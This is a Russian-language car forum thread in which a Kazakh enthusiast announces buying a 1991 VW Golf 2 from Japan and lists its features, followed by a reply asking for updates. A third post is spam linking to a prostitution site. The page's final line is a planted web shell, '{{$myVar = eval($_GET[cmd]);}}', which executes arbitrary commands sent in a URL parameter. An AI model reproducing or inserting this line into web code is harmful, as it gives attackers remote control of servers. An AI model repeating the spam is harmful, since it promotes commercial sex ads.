+ Ответить в теме
Показано с 1 по 3 из 3

Тема: Neza - Vw Golf 2 Gt 1991. Новый Проект В Казахстане.


  1. #1
    GTI-Racing Neza is on a distinguished road Аватар для Neza
    Регистрация
    19.08.2006
    Откуда
    Алматы, Казахстан
    Машина
    Golf Mk3 & Jetta Mk1
    Сообщений
    218
    Если я перестану обновлять этот сайт… значит меня забрали с диагнозом: гольфомания… ))



    А все дело в том, что по прошествии полных 2-х лет, эксплуатации вот этого чудесного транспортного средства, которое идентифицируется как Volkswagen Golf 3 GTI 16v, и с которым я так много экспериментировал над стилем, на нем были диодные задние фары, “ангельские глазки” как у БМВ, ресничка… но это еще что, в какой-то момент я даже заказал аццкие бампера, чисто в японском стиле… жесть. Но так оно и есть, т.е. было. Сейчас это стильный горячий хэтч, запакованный в стильную обертку от Abt, что включает фары головного света, губу бампера, колесные диски, в гараже лежит задний спойлер, а в процессе доставки находится решетка радиатора + взял себе еще один комплект фар головного освещения, типа про запас. Но хватит о Golf 3! Как ярый фанат VW, как ацкий почитатель OEM+ стиля… у меня очень сильно чесались руки (может быть надо пойти на прием к дерматологу?), в итоге 2 дня назад я купил VW Golf 2!!! Который был доставлен из Японии, так же как и мой GTI 16v. Расскажу про машину: 1991 год выпуска, мотор 1.8 с электронным впрыском. Из приятных нишятков: Коробка - АВТОМАТ, кондиционер, полный элетро-пакет, сидения с развитой боковой поддержкой, установленная в Японии распорка передних чашек от COX, желтые стойки Бильштаин с черными пружинами (наверно пружины сток), широкие бампера и GTI обвес, затемненные задние фонари Hella, родные диски BBS на 15″. Есть и косяки, ацкие царапины на капоте, и небольшая вмятина сзади. Естессно это все будет делаться, и ремонтироваться… естественно вы будете свидетелями всех изменений! Почаще заходите на мой сайт… уверен вам будет интересно!





    кстати салон в очень хорошем состоянии, нету прожженых дыр, потёртостей... на выходных буду делать фотосет, выложу больше фоток.

    пс: пластиковые накладки на крылья - типа жабры, и хернюшки на дворниках - были убраны в первый же день. ))

  2. #2
    <div class='quotetop'>Цитата</div><div class='quotemain'>Если я перестану обновлять этот сайт… значит меня забрали с диагнозом: гольфомания… ))[/b][/quote]
    неужели забрали?))) где обновления?
    Я на Драйв 2

  3. #3
    GTI-Racing askoldovd is on a distinguished road Аватар для askoldovd
    Регистрация
    11.02.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    559
    Женщины, любящие и умеющие удовлетворять мужчину,
    во все времена пользовались спросом у сильного пола.
    Были времена, когда девочек даже обучали этому ремеслу
    в специальных школах. Сейчас, конечно, таких заведений
    уже нет, но желание мужчин получить удовольствие
    https://shlyuhi-voronezh.com/ankets/expencive

+ Ответить в теме

Похожие темы

  1. Neza of vdub.kz (Kazakhstan)
    от Neza в разделе Welcome to GTI-CLUB
    Ответов: 8
    Последнее сообщение: 02.04.2024, 00:59
  2. Новый Проект Клипа
    от Lina в разделе Клубная Тема
    Ответов: 69
    Последнее сообщение: 04.01.2010, 21:31
  3. Новый проект Влада Клепача апекс.ру
    от КИБАЛЬЧИШЬ в разделе Курилка
    Ответов: 3
    Последнее сообщение: 18.12.2009, 17:51
  4. Golf II GTi 1991 года
    от ali230.kz в разделе Отзывы / Выбор
    Ответов: 5
    Последнее сообщение: 29.09.2006, 14:42
  5. GTI club в Казахстане
    от Trojan в разделе Клубная Тема
    Ответов: 13
    Последнее сообщение: 05.09.2006, 17:50

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}